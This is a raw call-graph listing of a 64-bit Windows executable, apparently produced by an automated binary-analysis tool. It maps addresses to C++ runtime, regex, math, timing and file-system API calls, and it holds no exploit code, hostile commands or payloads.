7ff6a9532150 6 API calls 14671->14672 14674 7ff6a9516f35 14671->14674 14672->14674 14673 7ff6a953a968 std::_Facet_Register 3 API calls 14675 7ff6a9516f77 14673->14675 14674->14673 14676 7ff6a9532150 6 API calls 14675->14676 14678 7ff6a9516f9b 14675->14678 14676->14678 14677 7ff6a953a968 std::_Facet_Register 3 API calls 14679 7ff6a9516fdd 14677->14679 14678->14677 14680 7ff6a9532150 6 API calls 14679->14680 14682 7ff6a9517001 14679->14682 14680->14682 14681 7ff6a953a968 std::_Facet_Register 3 API calls 14683 7ff6a9517043 14681->14683 14682->14681 14684 7ff6a9532150 6 API calls 14683->14684 14686 7ff6a9517067 14683->14686 14684->14686 14685 7ff6a953a968 std::_Facet_Register 3 API calls 14687 7ff6a95170a9 14685->14687 14686->14685 14688 7ff6a9532150 6 API calls 14687->14688 14723 7ff6a95170cd 14687->14723 14688->14723 14689 7ff6a9517132 _Query_perf_frequency _Query_perf_counter 14689->14723 14690 7ff6a9517cb5 _time64 srand rand 15849 7ff6a95143e0 SHGetFolderPathA 14690->15849 14693 7ff6a9517c29 14693->14690 14694 7ff6a9517cad 14693->14694 14697 7ff6a9517ca6 _invalid_parameter_noinfo_noreturn 14693->14697 14695 7ff6a953a960 _Receive_impl free 14694->14695 14695->14690 14696 7ff6a952e980 11 API calls 14698 7ff6a9517d0a 14696->14698 14697->14694 14699 7ff6a9517d7e _stat64i32 14698->14699 14700 7ff6a9517d79 14698->14700 14702 7ff6a9517d72 _invalid_parameter_noinfo_noreturn 14698->14702 14704 7ff6a9517db0 14699->14704 14703 7ff6a953a960 _Receive_impl free 14700->14703 14702->14700 14703->14699 14705 7ff6a9517dce _mkdir 14704->14705 14706 7ff6a9517dd4 14704->14706 14705->14706 14707 7ff6a9517e31 14706->14707 14708 7ff6a95312f0 2 API calls 14706->14708 14709 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14707->14709 14710 7ff6a9517def 14708->14710 14711 7ff6a9517e5c 14709->14711 14712 7ff6a9517e2c 14710->14712 14713 7ff6a9517e25 _invalid_parameter_noinfo_noreturn 14710->14713 14711->14105 14714 7ff6a953a960 _Receive_impl free 14712->14714 14713->14712 14714->14707 14715 7ff6a95173ff log cos sin exp 14715->14723 14716 7ff6a951749e pow 14716->14723 14717 7ff6a9517500 tan 14718 7ff6a95311f0 7 API calls 14717->14718 14722 7ff6a9517557 14718->14722 14719 7ff6a953a968 std::_Facet_Register 3 API calls 14720 7ff6a95175f3 memset 14719->14720 14720->14723 14721 7ff6a9532ac0 memcpy 14721->14723 14722->14719 14723->14689 14723->14693 14723->14715 14723->14716 14723->14717 14723->14721 14724 7ff6a9517c1b _invalid_parameter_noinfo_noreturn 14723->14724 14725 7ff6a9517c22 _invalid_parameter_noinfo_noreturn 14723->14725 14726 7ff6a953a960 free _Receive_impl 14723->14726 14724->14725 14725->14693 14726->14723 14762 7ff6a952370a ?_Random_device@std@ 14761->14762 14762->14181 14765 7ff6a9530754 14764->14765 14766 7ff6a953a3ef AreFileApisANSI 14764->14766 14767 7ff6a95125c0 14765->14767 14766->14765 14768 7ff6a95126da 14767->14768 14769 7ff6a9512612 14767->14769 14768->14254 14781 7ff6a95126fb 14769->14781 14782 7ff6a953a404 MultiByteToWideChar 14769->14782 14772 7ff6a9512701 14773 7ff6a9512050 12 API calls 14772->14773 14775 7ff6a951270d 14773->14775 14777 7ff6a951264d 14778 7ff6a953a404 __std_fs_convert_narrow_to_wide 2 API calls 14777->14778 14779 7ff6a95126cf 14778->14779 14779->14768 14805 7ff6a9512050 14779->14805 14809 7ff6a9511d70 14781->14809 14783 7ff6a9512632 14782->14783 14784 7ff6a953a42e GetLastError 14782->14784 14783->14772 14783->14777 14785 7ff6a9531380 14783->14785 14784->14783 14786 7ff6a9531526 14785->14786 14789 7ff6a95313af 14785->14789 14813 7ff6a95118f0 ?_Xlength_error@std@@YAXPEBD 14786->14813 14788 7ff6a953152b 14792 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 14788->14792 14789->14788 14790 7ff6a953145d 14789->14790 14791 7ff6a9531431 14789->14791 14797 7ff6a9531415 14789->14797 14794 7ff6a953a968 std::_Facet_Register 3 API calls 14790->14794 14791->14788 14793 7ff6a953143e 14791->14793 14795 7ff6a9531531 14792->14795 14796 7ff6a953a968 std::_Facet_Register 3 API calls 14793->14796 14794->14797 14796->14797 14798 7ff6a95314dd memcpy 14797->14798 14799 7ff6a953147d memcpy 14797->14799 14802 7ff6a95314d6 _invalid_parameter_noinfo_noreturn 14797->14802 14801 7ff6a95314d4 14798->14801 14800 7ff6a9531490 14799->14800 14800->14802 14803 7ff6a95314c9 14800->14803 14801->14777 14802->14798 14804 7ff6a953a960 _Receive_impl free 14803->14804 14804->14801 14806 7ff6a9512060 14805->14806 14814 7ff6a9511c80 14806->14814 14810 7ff6a9511d7e 14809->14810 14811 7ff6a9511c80 11 API calls 14810->14811 14812 7ff6a9511d95 _CxxThrowException __std_exception_copy 14811->14812 14812->14772 14815 7ff6a9511cb6 __std_exception_copy 14814->14815 14816 7ff6a9511d3a 14815->14816 14817 7ff6a9511d05 14815->14817 14819 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14816->14819 14818 7ff6a9511d35 14817->14818 14820 7ff6a9511d2e _invalid_parameter_noinfo_noreturn 14817->14820 14821 7ff6a953a960 _Receive_impl free 14818->14821 14822 7ff6a9511d5b _CxxThrowException 14819->14822 14820->14818 14821->14816 14825 7ff6a953a55a 14823->14825 14824 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14826 7ff6a95130f8 14824->14826 14828 7ff6a953a5bb GetFileAttributesExW 14825->14828 14836 7ff6a953a620 14825->14836 14838 7ff6a953a563 14825->14838 14826->14258 14826->14261 14829 7ff6a953a5cf GetLastError 14828->14829 14828->14836 14831 7ff6a953a5de FindFirstFileW 14829->14831 14829->14838 14834 7ff6a953a5fd FindClose 14831->14834 14835 7ff6a953a5f2 GetLastError 14831->14835 14832 7ff6a953a6be 14839 7ff6a953a6cd GetFileInformationByHandleEx 14832->14839 14840 7ff6a953a76f 14832->14840 14833 7ff6a953a69e 14837 7ff6a953a6a9 CloseHandle 14833->14837 14833->14838 14834->14836 14835->14838 14836->14838 14859 7ff6a953a840 CreateFileW 14836->14859 14837->14838 14843 7ff6a953a830 abort 14837->14843 14838->14824 14841 7ff6a953a6e7 GetLastError 14839->14841 14842 7ff6a953a710 14839->14842 14844 7ff6a953a7ca 14840->14844 14845 7ff6a953a78a GetFileInformationByHandleEx 14840->14845 14841->14838 14846 7ff6a953a6f5 CloseHandle 14841->14846 14842->14840 14853 7ff6a953a731 GetFileInformationByHandleEx 14842->14853 14843->14838 14847 7ff6a953a81d 14844->14847 14848 7ff6a953a7e1 14844->14848 14845->14844 14849 7ff6a953a7a0 GetLastError 14845->14849 14846->14838 14851 7ff6a953a702 abort 14846->14851 14847->14838 14854 7ff6a953a823 CloseHandle 14847->14854 14848->14838 14852 7ff6a953a7e7 CloseHandle 14848->14852 14849->14838 14850 7ff6a953a7b2 CloseHandle 14849->14850 14850->14838 14855 7ff6a953a7c3 abort 14850->14855 14851->14838 14852->14838 14852->14843 14853->14840 14856 7ff6a953a74d GetLastError 14853->14856 14854->14838 14854->14843 14855->14844 14856->14838 14857 7ff6a953a75b CloseHandle 14856->14857 14857->14838 14858 7ff6a953a768 abort 14857->14858 14858->14840 14860 7ff6a953a698 14859->14860 14861 7ff6a953a882 GetLastError 14859->14861 14860->14832 14860->14833 14861->14860 14863 7ff6a95134d2 14862->14863 14916 7ff6a952e060 ?_Init@locale@std@@CAPEAV_Locimp@12@_N 14863->14916 14866 7ff6a95135d0 14866->14866 14867 7ff6a9511670 2 API calls 14866->14867 14868 7ff6a951361c 14867->14868 14869 7ff6a953a968 std::_Facet_Register 3 API calls 14868->14869 14870 7ff6a9513644 14869->14870 14871 7ff6a9532150 6 API calls 14870->14871 14873 7ff6a9513664 14870->14873 14871->14873 14872 7ff6a953a968 std::_Facet_Register 3 API calls 14874 7ff6a95136a3 14872->14874 14873->14872 14875 7ff6a9532150 6 API calls 14874->14875 14877 7ff6a95136c3 14874->14877 14875->14877 14876 7ff6a953a968 std::_Facet_Register 3 API calls 14878 7ff6a9513702 14876->14878 14877->14876 14879 7ff6a9532150 6 API calls 14878->14879 14881 7ff6a9513722 14878->14881 14879->14881 14880 7ff6a953a968 std::_Facet_Register 3 API calls 14882 7ff6a9513761 14880->14882 14881->14880 14883 7ff6a9532150 6 API calls 14882->14883 14885 7ff6a9513781 14882->14885 14883->14885 14884 7ff6a953a968 std::_Facet_Register 3 API calls 14886 7ff6a95137c0 14884->14886 14885->14884 14887 7ff6a9532150 6 API calls 14886->14887 14889 7ff6a95137e0 14886->14889 14887->14889 14888 7ff6a953a968 std::_Facet_Register 3 API calls 14890 7ff6a951381f 14888->14890 14889->14888 14891 7ff6a9532150 6 API calls 14890->14891 14906 7ff6a951383f 14890->14906 14891->14906 14892 7ff6a95138a1 _Query_perf_frequency _Query_perf_counter 14892->14906 14893 7ff6a9514328 14920 7ff6a952f760 14893->14920 14894 7ff6a9514320 14897 7ff6a953a960 _Receive_impl free 14894->14897 14896 7ff6a9514319 _invalid_parameter_noinfo_noreturn 14896->14894 14897->14893 14898 7ff6a9514350 14952 7ff6a952df70 14898->14952 14899 7ff6a95142a8 14899->14893 14899->14894 14899->14896 14902 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14903 7ff6a951437e 14902->14903 14903->14281 14904 7ff6a9513b5c log cos sin exp 14904->14906 14905 7ff6a9513bf1 pow 14905->14906 14906->14892 14906->14899 14906->14904 14906->14905 14907 7ff6a9513c50 tan 14906->14907 14912 7ff6a9532ac0 memcpy 14906->14912 14913 7ff6a951429a _invalid_parameter_noinfo_noreturn 14906->14913 14914 7ff6a953a960 free _Receive_impl 14906->14914 14915 7ff6a95142a1 _invalid_parameter_noinfo_noreturn 14906->14915 14908 7ff6a95311f0 7 API calls 14907->14908 14910 7ff6a9513c9b 14908->14910 14909 7ff6a953a968 std::_Facet_Register 3 API calls 14911 7ff6a9513d0e memset 14909->14911 14910->14909 14911->14906 14912->14906 14913->14915 14914->14906 14915->14899 14917 7ff6a953a968 std::_Facet_Register 3 API calls 14916->14917 14918 7ff6a952e0c9 ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@ ??Bid@locale@std@ ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD 14917->14918 14919 7ff6a95135a7 ?_Random_device@std@ 14918->14919 14919->14866 14936 7ff6a952f7ce 14920->14936 14921 7ff6a952fadb 14922 7ff6a952fa1f 14921->14922 14925 7ff6a952fa1a 14921->14925 14928 7ff6a952fb24 _invalid_parameter_noinfo_noreturn 14921->14928 14924 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 14922->14924 14923 7ff6a952f800 ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 14923->14936 14927 7ff6a952fa2e 14924->14927 14926 7ff6a953a960 _Receive_impl free 14925->14926 14926->14922 14927->14898 14929 7ff6a952fb2b 14928->14929 15041 7ff6a9511980 14929->15041 14930 7ff6a952f8cc memcpy 14930->14936 14931 7ff6a952fa42 14931->14929 14939 7ff6a952eac0 20 API calls 14931->14939 14932 7ff6a952f993 14933 7ff6a952fb30 14932->14933 15019 7ff6a952eac0 14932->15019 14940 7ff6a9511980 Concurrency::cancel_current_task 11 API calls 14933->14940 14936->14921 14936->14923 14936->14930 14936->14931 14936->14932 14960 7ff6a9531540 14936->14960 14980 7ff6a9531060 14936->14980 15000 7ff6a95316b0 14936->15000 14943 7ff6a952fa59 14939->14943 14944 7ff6a952fb36 14940->14944 14942 7ff6a952f9aa 14945 7ff6a952f9e3 14942->14945 14946 7ff6a952f9de 14942->14946 14948 7ff6a952fa89 _invalid_parameter_noinfo_noreturn 14942->14948 14943->14945 14947 7ff6a952fa90 14943->14947 14943->14948 14944->14898 14945->14922 14945->14925 14951 7ff6a952fad4 _invalid_parameter_noinfo_noreturn 14945->14951 14949 7ff6a953a960 _Receive_impl free 14946->14949 14950 7ff6a953a960 _Receive_impl free 14947->14950 14948->14947 14949->14945 14950->14945 14951->14921 14953 7ff6a952df91 14952->14953 14955 7ff6a952dfc7 14952->14955 14956 7ff6a953a960 _Receive_impl free 14953->14956 14958 7ff6a952e04d _invalid_parameter_noinfo_noreturn 14953->14958 14954 7ff6a951435a 14954->14902 14955->14954 14957 7ff6a952e008 14955->14957 14955->14958 14956->14955 14959 7ff6a953a960 _Receive_impl free 14957->14959 14959->14954 14961 7ff6a9531699 14960->14961 14965 7ff6a9531570 14960->14965 15044 7ff6a95118f0 ?_Xlength_error@std@@YAXPEBD 14961->15044 14962 7ff6a95315d5 14966 7ff6a953a968 std::_Facet_Register 3 API calls 14962->14966 14964 7ff6a953169e 14970 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 14964->14970 14965->14962 14967 7ff6a95315c8 14965->14967 14968 7ff6a9531600 14965->14968 14969 7ff6a95315bb 14965->14969 14966->14969 14967->14962 14967->14964 14975 7ff6a953a968 std::_Facet_Register 3 API calls 14968->14975 14972 7ff6a9531667 memcpy 14969->14972 14973 7ff6a953161c memcpy 14969->14973 14974 7ff6a9531660 _invalid_parameter_noinfo_noreturn 14969->14974 14971 7ff6a95316a4 14970->14971 14979 7ff6a953165e 14972->14979 14976 7ff6a9531653 14973->14976 14977 7ff6a953163e 14973->14977 14974->14972 14975->14969 14978 7ff6a953a960 _Receive_impl free 14976->14978 14977->14974 14977->14976 14978->14979 14979->14936 14981 7ff6a95311d9 14980->14981 14986 7ff6a9531098 14980->14986 15045 7ff6a95118f0 ?_Xlength_error@std@@YAXPEBD 14981->15045 14983 7ff6a95310fd 14985 7ff6a953a968 std::_Facet_Register 3 API calls 14983->14985 14984 7ff6a95311de 14988 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 14984->14988 14987 7ff6a95310e3 14985->14987 14986->14983 14986->14987 14989 7ff6a9531128 14986->14989 14990 7ff6a95310f0 14986->14990 14991 7ff6a9531195 _invalid_parameter_noinfo_noreturn 14987->14991 14994 7ff6a9531148 memcpy memcpy 14987->14994 14995 7ff6a953119c memcpy memcpy 14987->14995 14993 7ff6a95311e4 14988->14993 14992 7ff6a953a968 std::_Facet_Register 3 API calls 14989->14992 14990->14983 14990->14984 14991->14995 14992->14987 14996 7ff6a9531173 14994->14996 14997 7ff6a9531188 14994->14997 14999 7ff6a9531193 14995->14999 14996->14991 14996->14997 14998 7ff6a953a960 _Receive_impl free 14997->14998 14998->14999 14999->14936 15001 7ff6a9531827 15000->15001 15005 7ff6a95316dd 15000->15005 15046 7ff6a95118f0 ?_Xlength_error@std@@YAXPEBD 15001->15046 15002 7ff6a9531747 15006 7ff6a953a968 std::_Facet_Register 3 API calls 15002->15006 15004 7ff6a953182c 15007 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 15004->15007 15005->15002 15008 7ff6a953173a 15005->15008 15009 7ff6a9531772 15005->15009 15010 7ff6a953172d 15005->15010 15006->15010 15012 7ff6a9531832 15007->15012 15008->15002 15008->15004 15014 7ff6a953a968 std::_Facet_Register 3 API calls 15009->15014 15011 7ff6a9531796 memcpy memset 15010->15011 15013 7ff6a95317e2 _invalid_parameter_noinfo_noreturn 15010->15013 15018 7ff6a95317e0 15010->15018 15015 7ff6a95317d5 15011->15015 15016 7ff6a95317c0 15011->15016 15013->15018 15014->15010 15017 7ff6a953a960 _Receive_impl free 15015->15017 15016->15013 15016->15015 15017->15018 15018->14936 15020 7ff6a952eaee 15019->15020 15021 7ff6a952ebc9 15020->15021 15025 7ff6a952eb04 15020->15025 15047 7ff6a95118f0 ?_Xlength_error@std@@YAXPEBD 15021->15047 15023 7ff6a952eb0a 15023->14942 15024 7ff6a952ebce 15029 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 15024->15029 15025->15023 15025->15024 15026 7ff6a952eb3a 15025->15026 15027 7ff6a952eb9e memcpy 15025->15027 15028 7ff6a952eb99 15025->15028 15030 7ff6a953a968 std::_Facet_Register 3 API calls 15026->15030 15027->14942 15031 7ff6a953a968 std::_Facet_Register 3 API calls 15028->15031 15032 7ff6a952ebd4 15029->15032 15033 7ff6a952eb50 15030->15033 15031->15027 15036 7ff6a952ec3e ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 15032->15036 15048 7ff6a952f0e0 15032->15048 15034 7ff6a952eb58 15033->15034 15035 7ff6a952eb92 _invalid_parameter_noinfo_noreturn 15033->15035 15034->15027 15035->15028 15038 7ff6a952ec5b 15036->15038 15039 7ff6a952ec4e 15036->15039 15038->14942 15040 7ff6a953a960 _Receive_impl free 15039->15040 15040->15038 15066 7ff6a9511910 __std_exception_copy 15041->15066 15049 7ff6a952f0f7 15048->15049 15050 7ff6a952f155 15048->15050 15054 7ff6a952eff0 15049->15054 15051 7ff6a952f157 ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@ 15050->15051 15051->15036 15053 7ff6a952f131 fclose 15053->15051 15055 7ff6a952f0c3 15054->15055 15056 7ff6a952f013 15054->15056 15057 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15055->15057 15056->15055 15058 7ff6a952f01d 15056->15058 15059 7ff6a952f0d2 15057->15059 15060 7ff6a952f036 ?unshift@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 15058->15060 15061 7ff6a952f061 15058->15061 15059->15053 15062 7ff6a952f05c 15060->15062 15063 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15061->15063 15062->15061 15065 7ff6a952f097 fwrite 15062->15065 15064 7ff6a952f07e 15063->15064 15064->15053 15065->15061 15067 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15066->15067 15068 7ff6a9511972 _CxxThrowException __std_exception_copy 15067->15068 15068->14933 15070 7ff6a95318aa 15069->15070 15071 7ff6a95319d0 ??1_Lockit@std@@QEAA 15070->15071 15072 7ff6a95318c1 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 15070->15072 15074 7ff6a95318cd 15070->15074 15073 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15071->15073 15072->15074 15075 7ff6a952c6ab 15073->15075 15074->15071 15076 7ff6a953a968 std::_Facet_Register 3 API calls 15074->15076 15087 7ff6a95318e3 15074->15087 15088 7ff6a952fb70 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 15075->15088 15077 7ff6a95318f5 15076->15077 15118 7ff6a9512150 15077->15118 15081 7ff6a953197b 15083 7ff6a95319ab 15081->15083 15085 7ff6a95319a4 _invalid_parameter_noinfo_noreturn 15081->15085 15082 7ff6a95319b0 15128 7ff6a953a8a0 15082->15128 15086 7ff6a953a960 _Receive_impl free 15083->15086 15085->15083 15086->15082 15087->15071 15089 7ff6a952fbd2 15088->15089 15090 7ff6a952fc47 ??1_Lockit@std@@QEAA 15089->15090 15092 7ff6a952fbe9 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 15089->15092 15093 7ff6a952fbf5 15089->15093 15091 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15090->15091 15094 7ff6a952c6b7 15091->15094 15092->15093 15093->15090 15095 7ff6a952fc0c ?_Getcat@?$ctype@D@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 15093->15095 15094->14436 15096 7ff6a952fc77 15095->15096 15097 7ff6a952fc20 15095->15097 15131 7ff6a95120c0 15096->15131 15099 7ff6a953a8a0 std::_Facet_Register 3 API calls 15097->15099 15101 7ff6a952fc32 15099->15101 15100 7ff6a952fc7c 15101->15090 15103 7ff6a952c791 15102->15103 15104 7ff6a953245b strchr 15102->15104 15105 7ff6a9531fc0 15103->15105 15104->15103 15135 7ff6a9532a30 15105->15135 15110 7ff6a9532139 15159 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15110->15159 15111 7ff6a9531ffd 15155 7ff6a9532970 15111->15155 15116 7ff6a953a968 std::_Facet_Register 3 API calls 15117 7ff6a9532012 15116->15117 15117->14441 15119 7ff6a9512175 15118->15119 15120 7ff6a95121b3 15118->15120 15122 7ff6a95311f0 7 API calls 15119->15122 15124 7ff6a951224a 15120->15124 15125 7ff6a9512282 _invalid_parameter_noinfo_noreturn 15120->15125 15126 7ff6a953a960 _Receive_impl free 15120->15126 15121 7ff6a951228e ??0_Locinfo@std@@QEAA@PEBD ??0facet@locale@std@@IEAA@_K ?_Getcoll@_Locinfo@std@@QEBA?AU_Collvec@ ??1_Locinfo@std@@QEAA 15121->15081 15121->15082 15122->15120 15123 7ff6a9512289 15127 7ff6a953a960 _Receive_impl free 15123->15127 15124->15121 15124->15123 15124->15125 15125->15123 15126->15124 15127->15121 15129 7ff6a953a968 std::_Facet_Register 3 API calls 15128->15129 15130 7ff6a953a8b3 15129->15130 15130->15087 15134 7ff6a9512090 15131->15134 15133 7ff6a95120ce _CxxThrowException __std_exception_copy 15133->15100 15134->15133 15136 7ff6a953a968 std::_Facet_Register 3 API calls 15135->15136 15137 7ff6a9531fe5 15136->15137 15138 7ff6a9532700 15137->15138 15160 7ff6a9533210 15138->15160 15141 7ff6a9532741 15142 7ff6a953a968 std::_Facet_Register 3 API calls 15141->15142 15144 7ff6a953275b 15142->15144 15147 7ff6a953a968 std::_Facet_Register 3 API calls 15144->15147 15146 7ff6a9532970 3 API calls 15146->15141 15150 7ff6a95327c5 15147->15150 15148 7ff6a9532430 strchr 15148->15150 15149 7ff6a9533210 51 API calls 15149->15150 15150->15148 15150->15149 15151 7ff6a9533880 3 API calls 15150->15151 15152 7ff6a953a968 std::_Facet_Register 3 API calls 15150->15152 15153 7ff6a9532970 3 API calls 15150->15153 15154 7ff6a9531ff0 15150->15154 15151->15150 15152->15150 15153->15150 15154->15110 15154->15111 15156 7ff6a953298d 15155->15156 15157 7ff6a953a968 std::_Facet_Register 3 API calls 15156->15157 15158 7ff6a9532008 15157->15158 15158->15116 15161 7ff6a9532717 15160->15161 15166 7ff6a9533230 15160->15166 15161->15141 15161->15154 15183 7ff6a9533880 15161->15183 15164 7ff6a9533853 15321 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15164->15321 15165 7ff6a9532430 strchr 15165->15166 15166->15161 15166->15164 15166->15165 15169 7ff6a953385e 15166->15169 15171 7ff6a9533880 __std_exception_copy malloc _CxxThrowException 15166->15171 15175 7ff6a9533869 15166->15175 15177 7ff6a9533874 15166->15177 15179 7ff6a953383e 15166->15179 15182 7ff6a9533848 15166->15182 15186 7ff6a95341f0 15166->15186 15210 7ff6a9534060 15166->15210 15245 7ff6a9534380 15166->15245 15283 7ff6a95347e0 15166->15283 15294 7ff6a9534580 15166->15294 15322 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15169->15322 15171->15166 15323 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15175->15323 15324 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15177->15324 15319 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15179->15319 15320 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15182->15320 15184 7ff6a953a968 std::_Facet_Register 3 API calls 15183->15184 15185 7ff6a9532736 15184->15185 15185->15146 15187 7ff6a9534209 15186->15187 15188 7ff6a9534316 15186->15188 15325 7ff6a9535ed0 15187->15325 15332 7ff6a9536380 15188->15332 15193 7ff6a953421b 15194 7ff6a953422d 15193->15194 15195 7ff6a953424f 15193->15195 15197 7ff6a9534368 15194->15197 15198 7ff6a9534237 15194->15198 15202 7ff6a953434a 15195->15202 15206 7ff6a953429b 15195->15206 15379 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15197->15379 15201 7ff6a95347e0 16 API calls 15198->15201 15204 7ff6a9534244 15201->15204 15207 7ff6a953435d 15202->15207 15377 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15202->15377 15204->15166 15208 7ff6a953a968 std::_Facet_Register 3 API calls 15206->15208 15378 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15207->15378 15209 7ff6a95342a5 15208->15209 15209->15166 15211 7ff6a9536a70 3 API calls 15210->15211 15215 7ff6a953407e 15211->15215 15212 7ff6a95340f1 15213 7ff6a95341ca 15212->15213 15217 7ff6a9534116 ?tolower@?$ctype@D@std@@QEBADD 15212->15217 15218 7ff6a953412b 15212->15218 15440 7ff6a9537b60 15213->15440 15214 7ff6a9532430 strchr 15214->15212 15215->15212 15215->15214 15217->15218 15219 7ff6a953a968 std::_Facet_Register 3 API calls 15218->15219 15221 7ff6a9534142 15218->15221 15219->15221 15220 7ff6a9532430 strchr 15220->15213 15221->15220 15222 7ff6a9537b60 26 API calls 15231 7ff6a95360ce 15222->15231 15223 7ff6a953635a 15492 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15223->15492 15224 7ff6a9536255 15224->15166 15226 7ff6a95361ea ?tolower@?$ctype@D@std@@QEBADD 15226->15231 15227 7ff6a9536365 15493 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15227->15493 15228 7ff6a9532430 strchr 15228->15231 15229 7ff6a953a968 std::_Facet_Register 3 API calls 15229->15231 15231->15222 15231->15223 15231->15224 15231->15226 15231->15227 15231->15228 15231->15229 15233 7ff6a9536265 15231->15233 15236 7ff6a9536350 15231->15236 15242 7ff6a9535840 10 API calls 15231->15242 15474 7ff6a9537f00 15231->15474 15234 7ff6a953627b ?tolower@?$ctype@D@std@@QEBADD 15233->15234 15235 7ff6a953628f 15233->15235 15234->15235 15238 7ff6a95362a6 15235->15238 15239 7ff6a953a968 std::_Facet_Register 3 API calls 15235->15239 15491 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15236->15491 15240 7ff6a95362e6 ?tolower@?$ctype@D@std@@QEBADD 15238->15240 15241 7ff6a95362fa 15238->15241 15239->15238 15240->15241 15241->15224 15244 7ff6a953a968 std::_Facet_Register 3 API calls 15241->15244 15242->15231 15244->15224 15246 7ff6a9534398 15245->15246 15247 7ff6a95344a1 15246->15247 15259 7ff6a95343bf 15246->15259 15281 7ff6a9534566 15246->15281 15249 7ff6a95344aa 15247->15249 15250 7ff6a95344d1 15247->15250 15251 7ff6a9533880 3 API calls 15249->15251 15253 7ff6a95344ed 15250->15253 15254 7ff6a95344e1 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15250->15254 15255 7ff6a95344b8 15251->15255 15257 7ff6a9532a30 3 API calls 15253->15257 15254->15253 15258 7ff6a9532700 50 API calls 15255->15258 15256 7ff6a9532430 strchr 15267 7ff6a9534403 15256->15267 15260 7ff6a95344f6 15257->15260 15261 7ff6a95344c3 15258->15261 15259->15256 15262 7ff6a9532700 50 API calls 15260->15262 15263 7ff6a9532970 3 API calls 15261->15263 15265 7ff6a9534501 15262->15265 15274 7ff6a95344cf 15263->15274 15264 7ff6a9532430 strchr 15266 7ff6a9534450 15264->15266 15268 7ff6a9532970 3 API calls 15265->15268 15266->15249 15269 7ff6a9534455 15266->15269 15267->15264 15270 7ff6a953450d 15268->15270 15271 7ff6a9534479 15269->15271 15272 7ff6a953445a 15269->15272 15596 7ff6a9535690 15270->15596 15276 7ff6a953455c 15271->15276 15277 7ff6a9534482 15271->15277 15585 7ff6a9536950 15272->15585 15274->15166 15605 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15276->15605 15280 7ff6a9536950 50 API calls 15277->15280 15282 7ff6a953448c 15280->15282 15606 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15281->15606 15282->15166 15284 7ff6a95347ff 15283->15284 15285 7ff6a953480f 15284->15285 15286 7ff6a953a968 std::_Facet_Register 3 API calls 15284->15286 15287 7ff6a9534883 ?tolower@?$ctype@D@std@@QEBADD 15285->15287 15289 7ff6a9534897 15285->15289 15286->15285 15288 7ff6a95348aa 15287->15288 15290 7ff6a95348d9 15288->15290 15291 7ff6a95348be realloc 15288->15291 15289->15288 15655 7ff6a9535840 15289->15655 15290->15166 15291->15290 15293 7ff6a95348d2 ?_Xbad_alloc@std@ 15291->15293 15293->15290 15296 7ff6a95345aa 15294->15296 15298 7ff6a95345a1 15294->15298 15295 7ff6a9532430 strchr 15297 7ff6a953460d 15295->15297 15296->15295 15303 7ff6a9532430 strchr 15297->15303 15305 7ff6a9534676 15297->15305 15298->15296 15299 7ff6a9532430 strchr 15298->15299 15302 7ff6a953479e 15298->15302 15301 7ff6a95346e4 15299->15301 15304 7ff6a9535ed0 2 API calls 15301->15304 15302->15166 15303->15305 15313 7ff6a95346f1 15304->15313 15663 7ff6a9536b10 15305->15663 15306 7ff6a95347c8 15685 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15306->15685 15309 7ff6a95347bd 15684 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15309->15684 15310 7ff6a9532430 strchr 15314 7ff6a9534757 15310->15314 15312 7ff6a9534702 15312->15296 15312->15309 15313->15306 15313->15310 15313->15312 15314->15312 15315 7ff6a9535ed0 2 API calls 15314->15315 15316 7ff6a953476a 15315->15316 15316->15312 15317 7ff6a95347b3 15316->15317 15683 7ff6a9532420 